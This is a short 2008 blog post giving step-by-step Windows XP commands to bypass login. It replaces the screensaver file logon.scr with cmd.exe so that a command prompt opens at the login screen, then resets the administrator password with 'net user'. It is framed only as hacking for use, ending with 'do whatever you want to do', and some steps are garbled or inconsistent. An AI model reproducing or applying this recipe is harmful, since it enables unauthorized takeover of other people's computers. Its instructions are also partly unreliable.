
Apr 15, 2008

How To Hac+k Admin Password Using Command Prompt

Its really easy to hack admin password in XP,

1. Go to Start –> Run –> Type in CMD
2. Enter command: cd\ windows\system32
3. mkdir newpass

4. copy logon.scr newpass\logon.scr

5. copy cmd.exe newpass\cmd.exe

6. del logon.scr

7. rename cmd.exe logon.scr

basically you are telling windows is to backup the command program and
the screen saver file. Then we edited the settings so when windows
loads the screen saver, we will get an unprotected dos prompt without
logging in. When this appears enter this command :-
net user password

Example: If the admin username is ‘CyberSix’ and you want change the password to ‘cyber6’ Then type in the following command :-
net user CyberSix cyber6

This will change the administrator password to cyber6.

it you have sucessfully hacked the Window XP Administrator Password now
you can Log in, using the hacked Window XP Administrator Password and
do whatever you want to do.


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